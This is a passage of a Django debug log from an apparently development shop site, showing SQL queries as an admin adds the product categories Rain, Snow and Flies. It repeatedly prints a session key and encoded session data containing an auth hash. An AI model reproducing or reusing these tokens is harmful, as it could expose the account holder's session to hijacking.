13:16:48] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:16:48,940 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:48.924699+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 48, 924699, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:48,944 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:16:49,032 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:16:49,091 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:16:49.089050+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 16, 49, 89050, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:16:49] "GET /shop/category/add/ HTTP/1.0" 200 9215 DEBUG 2019-12-13 13:16:49,432 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:49.423098+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 49, 423098, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:49,434 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:16:49] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:20:58,012 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:20:57.998503+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 20, 57, 998503, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:20:58,016 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:20:58,026 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 9; args=(9,) DEBUG 2019-12-13 13:20:58,031 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 9 LIMIT 1; args=(9,) DEBUG 2019-12-13 13:20:58,035 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 9 AND "shop_category"."slug" = 'rain') LIMIT 1; args=(9, 'rain') DEBUG 2019-12-13 13:20:58,037 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Rain' LIMIT 1; args=('Rain',) DEBUG 2019-12-13 13:20:58,040 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(9,) DEBUG 2019-12-13 13:20:58,042 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 10 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 10, 1, 1] DEBUG 2019-12-13 13:20:58,046 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Rain', 9, 'categories/2019/12/13/collection9.png', 'Rain', false, 'rain', 2, 3, 10, 1) RETURNING "shop_category"."id"; args=('Rain', 9, 'categories/2019/12/13/collection9.png', 'Rain', False, 'rain', 2, 3, 10, 1) DEBUG 2019-12-13 13:20:58,049 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:20:58.047388+00:00'::timestamptz, 6, 8, '44', 'Rain', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 20, 58, 47388, tzinfo=), 6, 8, '44', 'Rain', 1, '[{"added": {}}]') [13/Dec/2019 13:20:58] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:20:58,355 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:20:58.345713+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 20, 58, 345713, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:20:58,357 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:20:58,400 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:20:58,448 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:20:58.446345+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 20, 58, 446345, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:20:58] "GET /shop/category/add/ HTTP/1.0" 200 9244 DEBUG 2019-12-13 13:20:58,822 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:20:58.808347+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 20, 58, 808347, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:20:58,826 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:20:58] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:21:20,478 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:21:20.464688+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 21, 20, 464688, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:21:20,483 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:21:20,500 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 9; args=(9,) DEBUG 2019-12-13 13:21:20,505 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 9 LIMIT 1; args=(9,) DEBUG 2019-12-13 13:21:20,508 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 9 AND "shop_category"."slug" = 'snow') LIMIT 1; args=(9, 'snow') DEBUG 2019-12-13 13:21:20,510 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Snow' LIMIT 1; args=('Snow',) DEBUG 2019-12-13 13:21:20,516 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Snow' AND "shop_category"."parent_id" = 9) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Snow', 9) DEBUG 2019-12-13 13:21:20,519 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(9,) DEBUG 2019-12-13 13:21:20,521 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 10 AND ("lft" > 3 OR "rght" > 3); args=[3, 2, 3, 2, 10, 3, 3] DEBUG 2019-12-13 13:21:20,525 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Snow', 9, 'categories/2019/12/13/collection9_y5Aperx.png', 'Snow', false, 'snow', 4, 5, 10, 1) RETURNING "shop_category"."id"; args=('Snow', 9, 'categories/2019/12/13/collection9_y5Aperx.png', 'Snow', False, 'snow', 4, 5, 10, 1) DEBUG 2019-12-13 13:21:20,528 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:21:20.526231+00:00'::timestamptz, 6, 8, '45', 'Snow', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 21, 20, 526231, tzinfo=), 6, 8, '45', 'Snow', 1, '[{"added": {}}]') [13/Dec/2019 13:21:20] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:21:20,822 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:21:20.814018+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 21, 20, 814018, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:21:20,825 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:21:20,870 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:21:20,921 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:21:20.919487+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 21, 20, 919487, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:21:20] "GET /shop/category/add/ HTTP/1.0" 200 9284 DEBUG 2019-12-13 13:21:21,260 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:21:21.247697+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 21, 21, 247697, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:21:21,265 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:21:21] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:21:52,220 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:21:52.211423+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 21, 52, 211423, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:21:52,222 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:21:52,228 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 13:21:52,231 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 10 LIMIT 1; args=(10,) DEBUG 2019-12-13 13:21:52,233 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 10 AND "shop_category"."slug" = 'flies') LIMIT 1; args=(10, 'flies') DEBUG 2019-12-13 13:21:52,234 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Flies' LIMIT 1; args=('Flies',) DEBUG 2019-12-13 13:21:52,236 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(10,) DEBUG 2019-12-13 13:21:52,238 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 1 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 1, 1, 1] DEBUG 2019-12-13 13:21:52,240 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Flies', 10, 'categories/2019/12/13/collection10.png', 'Flies', false, 'flies', 2, 3, 1, 1) RETURNING "shop_category"."id"; args=('Flies', 10, 'categories/2019/12/13/collection10.png', 'Flies', False, 'flies', 2, 3, 1, 1) DEBUG 2019-12-13 13:21:52,242 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:21:52.241228+00:00'::timestamptz, 6, 8, '46', 'Flies', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 21, 52, 241228, tzinfo=), 6, 8, '46', 'Flies', 1, '[{"added": {}}]') [13/Dec/2019 13:21:52] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:21:52,542 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:21:52.528053+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 21, 52, 528053, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:21:52,546 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:21:52,620 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:21:52,707 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:21:52.704292+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 21, 52, 704292, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:21:52] "GET /shop/category/add/ HTTP/1.0" 200 9326 DEBUG 2019-12-13 13:21:53,048 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:21:53.033647+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 21, 53, 33647, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:21:53,052 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:21:53] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:21:56,697 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:21:56.683662+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 21, 56, 683662, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:21:56,701 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:21:56,706 utils 11259 139831317362432 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 13:21:56,707 utils 11259 139831317362432 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 13:21:56,716 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 13:21:57,043 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:21:57.041603+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 21, 57, 41603, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:21:57] "GET /shop/category/ HTTP/1.0" 200 15719 DEBUG 2019-12-13 13:21:57,392 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:21:57.378103+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 21, 57, 378103, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:21:57,396 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", 